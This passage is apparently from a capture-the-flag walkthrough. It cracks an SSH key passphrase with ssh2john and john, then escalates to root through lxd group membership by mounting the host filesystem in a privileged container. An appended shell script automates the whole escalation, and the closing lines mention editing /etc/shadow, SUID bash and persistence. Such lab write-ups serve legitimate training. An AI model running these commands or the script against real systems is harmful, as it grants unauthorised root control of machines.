We copy the key to our machine and restrict its permissions with chmod 600 id_rsa (ssh refuses to use a private key that is readable by other users).
With this key we try to log in via ssh with ssh -i id_rsa john@10.10.192.142, but it prompts for the key's passphrase.
Since we have a wordlist of candidate passwords, we convert the key into a hash that john can crack with ssh2john:
ssh2john id_rsa > hash
Then, running john against that hash file with --wordlist pointing at our dictionary, we recover the passphrase that protects the RSA key.
Privilege Escalation
Now we can log in via ssh with the key and its passphrase and start with the privilege escalation.
We get the first flag.
With the id command we can see that we are in the lxd group, and some research online shows that membership in this group lets us escalate to root: any lxd member can create a privileged container and mount the host's filesystem into it.
On our machine (the attacker box):
sudo su
# Install the requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
# Clone the repo
git clone https://github.com/lxc/distrobuilder
# Build distrobuilder
cd distrobuilder
make
# Prepare the Alpine build
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Build the container image (produces lxd.tar.xz and rootfs.squashfs in the current directory)
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18
Then we upload the resulting lxd.tar.xz and rootfs.squashfs to the vulnerable machine (for example with scp, since we already have ssh access).
We add the image:
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # we can see the newly imported image
We create a privileged container and attach the host's root filesystem to it:
lxc init alpine privesc -c security.privileged=true
lxc list # list the container
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
We run the container and get a shell inside it:
lxc start privesc
lxc exec privesc /bin/sh
root@privesc:~# cd /mnt/root # this is where the whole victim filesystem is mounted
Being root inside a privileged container with the host filesystem under /mnt/root is effectively root on the host: chroot /mnt/root gives a shell on the victim itself, or the files under /mnt/root (for example /mnt/root/etc/shadow, or a SUID copy of bash placed there) can be edited directly.
If any part of the privilege escalation doesn't work for you, the technique is documented in the Hacktricks Github repository so you can investigate for yourselves.
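The steps above, wrapped in the checks a practitioner would want before and after running them, as an added example that is not part of the original writeup. It assumes (my assumptions, not the page's) that lxd.tar.xz and rootfs.squashfs have already been uploaded to the current directory on the victim, and it reuses the image alias alpine, the container name privesc and the /mnt/root mountpoint from the writeup. The group check and the mount check take their input as arguments so they can be exercised offline without an LXD daemon.

```shell
#!/bin/sh
# Added example (not from the original writeup): lxd-group escalation with
# pre-flight and post-mount checks. Assumed: lxd.tar.xz and rootfs.squashfs
# are in the current directory; alias "alpine" and container "privesc".

# Is "lxd" one of the groups in a space-separated list such as `id -nG` prints?
# The list is passed in rather than read from the system so it can be tested.
in_lxd_group() {
    for g in $1; do
        [ "$g" = "lxd" ] && return 0
    done
    return 1
}

# Emit the lxc commands of the escalation, one per line, so they can be
# reviewed (or diffed against the writeup) before anything is executed.
lxd_privesc_commands() {
    alias_name="$1"; ctr="$2"
    printf '%s\n' \
        "lxc image import lxd.tar.xz rootfs.squashfs --alias $alias_name" \
        "lxc init $alias_name $ctr -c security.privileged=true" \
        "lxc config device add $ctr host-root disk source=/ path=/mnt/root recursive=true" \
        "lxc start $ctr"
}

# Does a directory look like a mounted host root filesystem? Inside the
# container this is run against /mnt/root before editing anything there.
host_root_mounted() {
    [ -f "$1/etc/passwd" ] && [ -f "$1/etc/shadow" ] && [ -d "$1/root" ]
}

# Run the escalation end to end, aborting early with a reason instead of
# failing half-way through with an opaque lxc error.
run_lxd_privesc() {
    alias_name="$1"; ctr="$2"
    in_lxd_group "$(id -nG)" || { echo "not in the lxd group; this path does not apply" >&2; return 1; }
    command -v lxc >/dev/null 2>&1 || { echo "lxc client not in PATH" >&2; return 1; }
    [ -f lxd.tar.xz ] && [ -f rootfs.squashfs ] || { echo "image files missing from $(pwd)" >&2; return 1; }
    lxd_privesc_commands "$alias_name" "$ctr" | while IFS= read -r cmd; do
        echo "+ $cmd" >&2
        $cmd || exit 1
    done || return 1
    # Root inside the container with the host at /mnt/root: verify the mount,
    # then chroot so the shell acts on the victim, not on the Alpine rootfs.
    lxc exec "$ctr" -- /bin/sh -c '
        [ -f /mnt/root/etc/shadow ] || { echo "host root not mounted at /mnt/root" >&2; exit 1; }
        exec chroot /mnt/root /bin/bash'
}

# Stand-alone, the script only reports whether the technique applies to the
# current user; the operator calls run_lxd_privesc alpine privesc explicitly.
if in_lxd_group "$(id -nG)"; then
    echo "lxd group: yes (run_lxd_privesc alpine privesc to continue)"
else
    echo "lxd group: no"
fi
```

Source the script on the victim and call run_lxd_privesc alpine privesc; the final chroot drops you into a root shell on the host filesystem, where the second flag and persistence live, rather than inside the throwaway Alpine container.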